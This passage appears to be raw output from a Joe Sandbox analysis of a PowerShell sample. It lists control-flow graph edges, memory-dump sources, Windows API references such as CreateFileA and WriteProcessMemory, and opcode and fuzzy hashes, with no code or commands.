6f96399-6f963cc 1526->1534 1534->1507 1542 6f963d2-6f96432 1534->1542 1542->1507 1549 6f96438-6f964e6 1542->1549 1549->1507 1572 6f964e8-6f96542 1549->1572 1570 6f9698c-6f969dc 1552->1570 1557 6f96718-6f96724 1553->1557 1558 6f96740 1553->1558 1562 6f9672e-6f96734 1557->1562 1563 6f96726-6f9672c 1557->1563 1559 6f96746-6f96794 1558->1559 1559->1552 1575 6f9679a-6f967af 1559->1575 1564 6f9673e 1562->1564 1563->1564 1564->1559 1570->1428 1572->1498 1580 6f967c9-6f967fe 1575->1580 1581 6f967b1-6f967b7 1575->1581 1580->1552 1590 6f96804-6f96824 1580->1590 1584 6f967b9 1581->1584 1585 6f967bb-6f967c7 1581->1585 1584->1580 1585->1580 1590->1552 1592 6f9682a-6f9690e 1590->1592 1592->1552 1603 6f96910-6f96957 1592->1603 1603->1570 1608->1381 1609->1381 1610->1381
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2984880389.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f90000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (fi
                                                                                        • API String ID: 0-1767130463
                                                                                        • Opcode ID: 369e5d8893ae1f223f7a7c40ae06baa93f0f410f32a4f550f44d30d3c594ec12
                                                                                        • Instruction ID: b7893a9d8570cc63dc21e03d38526f90b584f53015d06a290834ff9620b38642
                                                                                        • Opcode Fuzzy Hash: 369e5d8893ae1f223f7a7c40ae06baa93f0f410f32a4f550f44d30d3c594ec12
                                                                                        • Instruction Fuzzy Hash: 76C22174A00218CFEB54DB18C954B9EB7B2EF85704F5481E9DA09AB341CB72DE82CF95

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1933 6f95d92-6f95dcf 1936 6f95ddb-6f95e1d 1933->1936 1937 6f95dd1-6f95dd6 1933->1937 1948 6f95e1f-6f95e24 1936->1948 1949 6f95e26 1936->1949 1940 6f95f50-6f95f74 1937->1940 1941 6f95fa3-6f95fb0 1940->1941 1942 6f95f76-6f95f9b 1940->1942 1944 6f974b4-6f974fd 1941->1944 1945 6f95fb6-6f96005 1941->1945 1942->1941 1989 6f956ac-6f956d0 1944->1989 1990 6f956a5 1944->1990 1962 6f9600b-6f9600d 1945->1962 1963 6f97502-6f975ba 1945->1963 1952 6f95e2b-6f95e45 1948->1952 1949->1952 1956 6f95e74-6f95ea9 1952->1956 1957 6f95e47-6f95e6c 1952->1957 1956->1944 1964 6f95eaf-6f95ed3 1956->1964 1957->1956 1965 6f96013-6f96025 1962->1965 1968 6f975e9-6f9761e 1963->1968 1969 6f975bc-6f975e1 1963->1969 1964->1944 1976 6f95ed9-6f95f35 1964->1976 1970 6f9602e-6f96052 1965->1970 1971 6f96027 1965->1971 1983 6f97709-6f9774d 1968->1983 1984 6f97624-6f97652 1968->1984 1969->1968 1974 6f96081-6f960e1 1970->1974 1975 6f96054-6f96079 1970->1975 1971->1970 1973 6f960e8-6f9610c 1971->1973 1980 6f9613b-6f96148 1973->1980 1981 6f9610e-6f96133 1973->1981 1974->1973 1975->1974 2031 6f95f4b 1976->2031 2032 6f95f37-6f95f46 1976->2032 1987 6f9614e-6f9617c 1980->1987 1988 6f97464-6f974ad 1980->1988 1981->1980 2037 6f97752 1983->2037 1984->1983 2005 6f97658-6f976ca 1984->2005 1987->1988 2006 6f96182-6f961b0 1987->2006 1988->1965 1994 6f956ff-6f9576c 1989->1994 1995 6f956d2-6f956f7 1989->1995 1990->1989 1993 6f95773-6f95797 1990->1993 1999 6f95799-6f957be 1993->1999 2000 6f957c6-6f95803 1993->2000 1994->1993 1995->1994 1999->2000 2029 6f9580a-6f95817 2000->2029 2047 6f976f8-6f976fe 2005->2047 2048 6f976cc-6f976e7 2005->2048 2006->1988 2019 6f961b6-6f961e4 2006->2019 2019->1988 2033 6f961ea-6f962c7 2019->2033 2029->1944 2034 6f9581d-6f95850 2029->2034 2031->2029 2032->2029 2063 6f9658d-6f965b1 2033->2063 2064 6f962cd-6f962e7 2033->2064 2042 6f9587f-6f9588c 2034->2042 2043 6f95852-6f95877 2034->2043 2037->2037 2042->1944 2046 6f95892-6f958e8 2042->2046 2043->2042 2046->1944 2055 6f958ee-6f95930 2046->2055 2047->1983 2206 6f95933 call 70c7808 2055->2206 2207 6f95933 call 70c7a60 2055->2207 2208 6f95933 call 70c77f2 2055->2208 2061 6f95935-6f95959 2061->1940 2076 6f9595f-6f9599a 2061->2076 2068 6f965e0-6f966f6 2063->2068 2069 6f965b3-6f965d8 2063->2069 2066 6f962e9-6f9630e 2064->2066 2067 6f96316-6f96323 2064->2067 2066->2067 2070 6f96329-6f9636d 2067->2070 2071 6f96544-6f96588 2067->2071 2125 6f96959-6f96987 2068->2125 2126 6f966fc-6f96716 2068->2126 2069->2068 2070->2071 2083 6f96373-6f96393 2070->2083 2071->2063 2086 6f959c9-6f959d6 2076->2086 2087 6f9599c-6f959c1 2076->2087 2083->2071 2093 6f96399-6f963cc 2083->2093 2090 6f959dc-6f95a04 2086->2090 2091 6f95d44-6f95d8d 2086->2091 2087->2086 2090->2091 2100 6f95a0a-6f95a32 2090->2100 2091->1952 2093->2071 2106 6f963d2-6f96432 2093->2106 2100->2091 2108 6f95a38-6f95a8e 2100->2108 2106->2071 2121 6f96438-6f964e6 2106->2121 2108->2091 2117 6f95a94-6f95b2c 2108->2117 2117->2091 2144 6f95b32-6f95bc6 2117->2144 2121->2071 2150 6f964e8-6f96542 2121->2150 2147 6f9698c-6f969dc 2125->2147 2131 6f96718-6f96724 2126->2131 2132 6f96740 2126->2132 2137 6f9672e-6f96734 2131->2137 2138 6f96726-6f9672c 2131->2138 2133 6f96746-6f96794 2132->2133 2133->2125 2154 6f9679a-6f967af 2133->2154 2139 6f9673e 2137->2139 2138->2139 2139->2133 2144->1952 2174 6f95bcc-6f95be6 2144->2174 2147->1988 2150->2063 2160 6f967c9-6f967fe 2154->2160 2161 6f967b1-6f967b7 2154->2161 2160->2125 2172 6f96804-6f96824 2160->2172 2165 6f967b9 2161->2165 2166 6f967bb-6f967c7 2161->2166 2165->2160 2166->2160 2172->2125 2178 6f9682a-6f9690e 2172->2178 2176 6f95be8 2174->2176 2177 6f95bef-6f95c13 2174->2177 2176->2177 2179 6f95c9a-6f95cbe 2176->2179 2180 6f95d3f 2176->2180 2181 6f95c42-6f95c93 2177->2181 2182 6f95c15-6f95c3a 2177->2182 2178->2125 2201 6f96910-6f96957 2178->2201 2179->1940 2183 6f95cc4-6f95cf1 2179->2183 2180->1952 2181->2179 2182->2181 2183->1940 2201->2147 2206->2061 2207->2061 2208->2061
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2984880389.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f90000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (fi
                                                                                        • API String ID: 0-1767130463
                                                                                        • Opcode ID: e8b9f0bab1f0fae0041d36b1c46c933ecfb860402f644b7369ffcbdfbc172687
                                                                                        • Instruction ID: e103d167105f24ab693398d6636eb8df81c5da227973edadc5f51ad0870f27ac
                                                                                        • Opcode Fuzzy Hash: e8b9f0bab1f0fae0041d36b1c46c933ecfb860402f644b7369ffcbdfbc172687
                                                                                        • Instruction Fuzzy Hash: 13A22074A00214CFEB54DB18C954B99B7B2EF85704F5481E9DA09AF342CB72EE82CF95

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2209 6f95d40-6f95d42 2210 6f95d44-6f95d8d 2209->2210 2216 6f95e2b-6f95e45 2210->2216 2217 6f95e74-6f95ea9 2216->2217 2218 6f95e47-6f95e6c 2216->2218 2221 6f95eaf-6f95ed3 2217->2221 2222 6f974b4-6f974fd 2217->2222 2218->2217 2221->2222 2225 6f95ed9-6f95f35 2221->2225 2235 6f956ac-6f956d0 2222->2235 2236 6f956a5 2222->2236 2241 6f95f4b 2225->2241 2242 6f95f37-6f95f46 2225->2242 2239 6f956ff-6f9576c 2235->2239 2240 6f956d2-6f956f7 2235->2240 2236->2235 2238 6f95773-6f95797 2236->2238 2243 6f95799-6f957be 2238->2243 2244 6f957c6-6f95803 2238->2244 2239->2238 2240->2239 2246 6f9580a-6f95817 2241->2246 2242->2246 2243->2244 2244->2246 2246->2222 2250 6f9581d-6f95850 2246->2250 2256 6f9587f-6f9588c 2250->2256 2257 6f95852-6f95877 2250->2257 2256->2222 2258 6f95892-6f958e8 2256->2258 2257->2256 2258->2222 2263 6f958ee-6f9590c 2258->2263 2265 6f95916-6f95930 2263->2265 2471 6f95933 call 70c7808 2265->2471 2472 6f95933 call 70c7a60 2265->2472 2473 6f95933 call 70c77f2 2265->2473 2266 6f95935-6f95959 2269 6f9595f-6f9599a 2266->2269 2270 6f95f50-6f95f74 2266->2270 2278 6f959c9-6f959d6 2269->2278 2279 6f9599c-6f959c1 2269->2279 2271 6f95fa3-6f95fb0 2270->2271 2272 6f95f76-6f95f9b 2270->2272 2271->2222 2274 6f95fb6-6f96005 2271->2274 2272->2271 2285 6f9600b-6f9600d 2274->2285 2286 6f97502-6f975ba 2274->2286 2278->2210 2281 6f959dc-6f95a04 2278->2281 2279->2278 2281->2210 2287 6f95a0a-6f95a32 2281->2287 2288 6f96013-6f96025 2285->2288 2290 6f975e9-6f9761e 2286->2290 2291 6f975bc-6f975e1 2286->2291 2287->2210 2298 6f95a38-6f95a8e 2287->2298 2292 6f9602e-6f96052 2288->2292 2293 6f96027 2288->2293 2304 6f97709-6f9774d 2290->2304 2305 6f97624-6f97652 2290->2305 2291->2290 2296 6f96081-6f960e1 2292->2296 2297 6f96054-6f96079 2292->2297 2293->2292 2295 6f960e8-6f9610c 2293->2295 2301 6f9613b-6f96148 2295->2301 2302 6f9610e-6f96133 2295->2302 2296->2295 2297->2296 2298->2210 2317 6f95a94-6f95b2c 2298->2317 2307 6f9614e-6f9617c 2301->2307 2308 6f97464-6f974ad 2301->2308 2302->2301 2339 6f97752 2304->2339 2305->2304 2318 6f97658-6f976ca 2305->2318 2307->2308 2319 6f96182-6f961b0 2307->2319 2308->2288 2317->2210 2348 6f95b32-6f95bc6 2317->2348 2346 6f976f8-6f976fe 2318->2346 2347 6f976cc-6f976e7 2318->2347 2319->2308 2327 6f961b6-6f961e4 2319->2327 2327->2308 2336 6f961ea-6f962c7 2327->2336 2361 6f9658d-6f965b1 2336->2361 2362 6f962cd-6f962e7 2336->2362 2339->2339 2346->2304 2348->2216 2366 6f95bcc-6f95be6 2348->2366 2367 6f965e0-6f966f6 2361->2367 2368 6f965b3-6f965d8 2361->2368 2364 6f962e9-6f9630e 2362->2364 2365 6f96316-6f96323 2362->2365 2364->2365 2369 6f96329-6f9636d 2365->2369 2370 6f96544-6f96588 2365->2370 2371 6f95be8 2366->2371 2372 6f95bef-6f95c13 2366->2372 2415 6f96959-6f96987 2367->2415 2416 6f966fc-6f96716 2367->2416 2368->2367 2369->2370 2389 6f96373-6f96393 2369->2389 2370->2361 2371->2372 2376 6f95c9a-6f95cbe 2371->2376 2377 6f95d3f 2371->2377 2378 6f95c42-6f95c93 2372->2378 2379 6f95c15-6f95c3a 2372->2379 2376->2270 2381 6f95cc4-6f95cf1 2376->2381 2377->2216 2378->2376 2379->2378 2381->2270 2389->2370 2397 6f96399-6f963cc 2389->2397 2397->2370 2405 6f963d2-6f96432 2397->2405 2405->2370 2412 6f96438-6f964e6 2405->2412 2412->2370 2435 6f964e8-6f96542 2412->2435 2433 6f9698c-6f969dc 2415->2433 2420 6f96718-6f96724 2416->2420 2421 6f96740 2416->2421 2425 6f9672e-6f96734 2420->2425 2426 6f96726-6f9672c 2420->2426 2422 6f96746-6f96794 2421->2422 2422->2415 2438 6f9679a-6f967af 2422->2438 2427 6f9673e 2425->2427 2426->2427 2427->2422 2433->2308 2435->2361 2443 6f967c9-6f967fe 2438->2443 2444 6f967b1-6f967b7 2438->2444 2443->2415 2453 6f96804-6f96824 2443->2453 2447 6f967b9 2444->2447 2448 6f967bb-6f967c7 2444->2448 2447->2443 2448->2443 2453->2415 2455 6f9682a-6f9690e 2453->2455 2455->2415 2466 6f96910-6f96957 2455->2466 2466->2433 2471->2266 2472->2266 2473->2266
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2984880389.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f90000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (fi
                                                                                        • API String ID: 0-1767130463
                                                                                        • Opcode ID: 4abbb57195747ddfb5cc07e36f34d5111280afedc4a017c7ee31632d49bb1503
                                                                                        • Instruction ID: 18757e75c308576771c8720e3b7c948d7077c0de281fcdcf62f0cfff7371c6b1
                                                                                        • Opcode Fuzzy Hash: 4abbb57195747ddfb5cc07e36f34d5111280afedc4a017c7ee31632d49bb1503
                                                                                        • Instruction Fuzzy Hash: 82922174A00214CFEB54DB18C954B99B7B2EF85704F54C1E9DA09AB341CB71EE82CF95

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2841 6fa703c-6fa7045 2842 6fa7047-6fa70a9 2841->2842 2843 6fa7014-6fa701b 2841->2843 2853 6fa70ab-6fa70b5 2842->2853 2854 6fa70e2-6fa713f CreateFileMappingA 2842->2854 2845 6fa701d-6fa7023 2843->2845 2846 6fa6fa6-6fa6fac 2843->2846 2845->2846 2847 6fa6fae 2846->2847 2848 6fa6fb5-6fa6fb6 2846->2848 2847->2848 2850 6fa6fb8-6fa6fc0 2847->2850 2851 6fa6fc1-6fa6fc2 2847->2851 2852 6fa6fc4-6fa700f 2847->2852 2848->2851 2851->2850 2852->2843 2853->2854 2855 6fa70b7-6fa70b9 2853->2855 2865 6fa7148-6fa7188 2854->2865 2866 6fa7141-6fa7147 2854->2866 2857 6fa70bb-6fa70c5 2855->2857 2858 6fa70dc-6fa70df 2855->2858 2861 6fa70c9-6fa70d8 2857->2861 2862 6fa70c7 2857->2862 2858->2854 2861->2861 2864 6fa70da 2861->2864 2862->2861 2864->2858 2872 6fa718a-6fa718e 2865->2872 2873 6fa7198 2865->2873 2866->2865 2872->2873 2874 6fa7190 2872->2874 2875 6fa7199 2873->2875 2874->2873 2875->2875
                                                                                        APIs
                                                                                        • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 06FA712F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985011959.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6fa0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileMapping
                                                                                        • String ID:
                                                                                        • API String ID: 524692379-0
                                                                                        • Opcode ID: 48dfec16b933c51c762c8ddc106644b0e60110f41e5c30d776ebb79e0fdf4187
                                                                                        • Instruction ID: 2dee2069508fc8cb81e2e546610e79ec658e64c3d6df78b58554c0cc937b8ddb
                                                                                        • Opcode Fuzzy Hash: 48dfec16b933c51c762c8ddc106644b0e60110f41e5c30d776ebb79e0fdf4187
                                                                                        • Instruction Fuzzy Hash: C65153B5E003099FDB54DFA9D881AAEBBF2FF88310F14842AE815A7240DB759841CF91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2876 6fa6c74-6fa6cde 2878 6fa6ce0-6fa6cea 2876->2878 2879 6fa6d17-6fa6d79 CreateFileA 2876->2879 2878->2879 2880 6fa6cec-6fa6cee 2878->2880 2888 6fa6d7b-6fa6d81 2879->2888 2889 6fa6d82-6fa6dc2 2879->2889 2882 6fa6cf0-6fa6cfa 2880->2882 2883 6fa6d11-6fa6d14 2880->2883 2884 6fa6cfe-6fa6d0d 2882->2884 2885 6fa6cfc 2882->2885 2883->2879 2884->2884 2887 6fa6d0f 2884->2887 2885->2884 2887->2883 2888->2889 2894 6fa6dd2 2889->2894 2895 6fa6dc4-6fa6dc8 2889->2895 2897 6fa6dd3 2894->2897 2895->2894 2896 6fa6dca 2895->2896 2896->2894 2897->2897
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 06FA6D69
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985011959.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6fa0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 232f33ae8a5c744fc82db4ebe685d7809159c0f37292e559f3c687700813306b
                                                                                        • Instruction ID: b25f5f485e7a7e38e28d18c3e2baaaa5784689154cd71783ff6d431507b3d737
                                                                                        • Opcode Fuzzy Hash: 232f33ae8a5c744fc82db4ebe685d7809159c0f37292e559f3c687700813306b
                                                                                        • Instruction Fuzzy Hash: DA4165B1D10349AFDB50DFA9C881BDEBFB2BF08310F288129E815A7254DB749851CF81
                                                                                        APIs
                                                                                        • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 06FA712F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985011959.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6fa0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileMapping
                                                                                        • String ID:
                                                                                        • API String ID: 524692379-0
                                                                                        • Opcode ID: 8a9325d0ba7a004b6f433eceafd4784bb957195188021b63db41ec44900a7378
                                                                                        • Instruction ID: e79441e4cc6d177a09f04d54d786d17ad325d0ee83fb846b45bee518c46ab385
                                                                                        • Opcode Fuzzy Hash: 8a9325d0ba7a004b6f433eceafd4784bb957195188021b63db41ec44900a7378
                                                                                        • Instruction Fuzzy Hash: F14174B5D103099FDF50EFA9D881BAEBBF1FF48310F14852AE815A7240CB759841CB81
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(?,?,?,?,?,?,?), ref: 06FA6D69
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985011959.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6fa0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: ff239bbc035be7ee4f35930b7a1cff1cdb8ad05455bb92def3f67e43d8cb7344
                                                                                        • Instruction ID: 87d5264c42e29c5531d8235d10d1842c34e2707adc0e3826b47d9c305117c876
                                                                                        • Opcode Fuzzy Hash: ff239bbc035be7ee4f35930b7a1cff1cdb8ad05455bb92def3f67e43d8cb7344
                                                                                        • Instruction Fuzzy Hash: 134165B1D003599FDF50DFA9C881B9EBBB2FF48310F288529E815E7254DB749851CB81
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 068A40C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2979733863.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_68a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: b0df093449a8624715a5a7df2d986d747a475426d88080ede51fde7df99483bf
                                                                                        • Instruction ID: 58bafc5ff1f334c3c1709f7adc011cbc5971fdeb0111c3fa0a465b3d952f382b
                                                                                        • Opcode Fuzzy Hash: b0df093449a8624715a5a7df2d986d747a475426d88080ede51fde7df99483bf
                                                                                        • Instruction Fuzzy Hash: D82112B5900349DFDF50CF9AD884BDEBBF4FB48310F10842AE918A3240D3B4A954CBA0
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 068A40C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2979733863.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_68a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 6e6b497f825c785df12b066a8a160c5c48f35a361c82fa663c4d03249cc503df
                                                                                        • Instruction ID: fa744c0da100b79517434ca56445d10d248a91e30a7ff9c7a21c41dcbd1afb8f
                                                                                        • Opcode Fuzzy Hash: 6e6b497f825c785df12b066a8a160c5c48f35a361c82fa663c4d03249cc503df
                                                                                        • Instruction Fuzzy Hash: 9C21E2B5900349DFDF50CF9AD884BDEBBF4FB48310F10852AE919A7250D3B4A954CBA0
                                                                                        APIs
                                                                                        • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 06FA73F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985011959.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6fa0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileView
                                                                                        • String ID:
                                                                                        • API String ID: 3314676101-0
                                                                                        • Opcode ID: 801c901dc1ed2ca22eb19308ae7682a503ce0c630ca3f78fe02b4bc8df8ecc53
                                                                                        • Instruction ID: a6f8e0a8cecf8be3a2bab0f12eed79a48a716ec0667673c52f3a9ac06edb0288
                                                                                        • Opcode Fuzzy Hash: 801c901dc1ed2ca22eb19308ae7682a503ce0c630ca3f78fe02b4bc8df8ecc53
                                                                                        • Instruction Fuzzy Hash: 031156769003499FDB10DFAAC845ADEBFF4EF88320F10841AE515A7250CB75A540CBA1
                                                                                        APIs
                                                                                        • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 06FA73F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985011959.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6fa0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileView
                                                                                        • String ID:
                                                                                        • API String ID: 3314676101-0
                                                                                        • Opcode ID: 09f82a07713423e9d88f991b1e385e3fda898c76deaadc1e3e05b9a4a07bdb4e
                                                                                        • Instruction ID: 8c2afb1bf6c57b8c30a70e7d086507610fb789270b71bd50e15846df468718d5
                                                                                        • Opcode Fuzzy Hash: 09f82a07713423e9d88f991b1e385e3fda898c76deaadc1e3e05b9a4a07bdb4e
                                                                                        • Instruction Fuzzy Hash: 3E112676900349DFDB10DFAAC845BDFBBF5EF88320F148419E919A7250CB79A550CBA1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2979733863.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_68a0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoSystem
                                                                                        • String ID:
                                                                                        • API String ID: 31276548-0
                                                                                        • Opcode ID: e1d0b511f7644506cde318adfcaae9233eb3a577a67bb539ae348e3deb6f24b6
                                                                                        • Instruction ID: 6030199d39fd1ecd478a0926162200d095eadcf355a84d6d54b5c0d0f1354064
                                                                                        • Opcode Fuzzy Hash: e1d0b511f7644506cde318adfcaae9233eb3a577a67bb539ae348e3deb6f24b6
                                                                                        • Instruction Fuzzy Hash: AB110FB1C0064A9BDB10CF9AD944B9EFBF4BF48220F14811AD918B3200C7B86A14CFA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981102863.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \V|m
                                                                                        • API String ID: 0-2015827483
                                                                                        • Opcode ID: 13ca21b587bf8f649de0085f02d270f88c1a1a2493c126fa43eab36fc97c471f
                                                                                        • Instruction ID: debe38997851f873aecb021eb3b5d9515ef26a84d953b2902b11092eacafa9c9
                                                                                        • Opcode Fuzzy Hash: 13ca21b587bf8f649de0085f02d270f88c1a1a2493c126fa43eab36fc97c471f
                                                                                        • Instruction Fuzzy Hash: 4AB16B70E10229DFDF90DFA9D88579EBBF1AF88314F148129E815AB254EB749841CF81
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981421552.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ho
                                                                                        • API String ID: 0-566462467
                                                                                        • Opcode ID: dd8f4586453ec10a7d1f50fc5534fb21b7832f025fa078bf5c5c84dd24c6b8c7
                                                                                        • Instruction ID: adf5b806ebe66cf9ca9bee54be9caaa2b243fbef08454b920d4fcab8849c8bcc
                                                                                        • Opcode Fuzzy Hash: dd8f4586453ec10a7d1f50fc5534fb21b7832f025fa078bf5c5c84dd24c6b8c7
                                                                                        • Instruction Fuzzy Hash: 0F018474D053489FCB41EFB4DA5159E7FF1AB45210B1006D6D519E7251DA315904CBA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2984880389.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6f90000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cf32dc43f5ca4d803b029d21a090ca92817708088d46b0aaf932110aa9193fe1
                                                                                        • Instruction ID: 40b3a6948f457511d91e000c7dfec90a51364c9ab1c05b9594eeaf3a95273b6b
                                                                                        • Opcode Fuzzy Hash: cf32dc43f5ca4d803b029d21a090ca92817708088d46b0aaf932110aa9193fe1
                                                                                        • Instruction Fuzzy Hash: 92A2F431F00205DFEF548F69C854AAABBE6AFC5210F29806EE915CB255DB72DC41CBB1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981102863.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a30000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: U
                                                                                        • API String ID: 0-3272044529
                                                                                        • Opcode ID: 64542b900d27b66ad8161e6e3cb08a543e6b0ce826e977ca570853343a19ec51
                                                                                        • Instruction ID: cb1f82234edde6dc31c0c2b65397a92b8e5c68abcdb867dbde2fdc3cc1987765
                                                                                        • Opcode Fuzzy Hash: 64542b900d27b66ad8161e6e3cb08a543e6b0ce826e977ca570853343a19ec51
                                                                                        • Instruction Fuzzy Hash: A9E0927490A348EFC701EFD4D900AA9BB74AB46300F1191D9E848AB392C6319E16CB95
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2981421552.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6a70000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b
                                                                                        • API String ID: 0-1908338681
                                                                                        • Opcode ID: 18e199cfb16858374acef6b6da6939fa8db29c8c8c30701e3758e2b8e360737c
                                                                                        • Instruction ID: b1f2aab4432d14bf6a9f8fece8eef98a5845666947e414e0501c4a5172b2bce7
                                                                                        • Opcode Fuzzy Hash: 18e199cfb16858374acef6b6da6939fa8db29c8c8c30701e3758e2b8e360737c
                                                                                        • Instruction Fuzzy Hash: ECD09230944729CFDB65DF24D984B99BBB1EB45301F1056D8900963141CB741E958F45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2985468302.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 78ef6815082c496aa0ee951a2746aeb9050002edb6db52037156cffe422abb5c
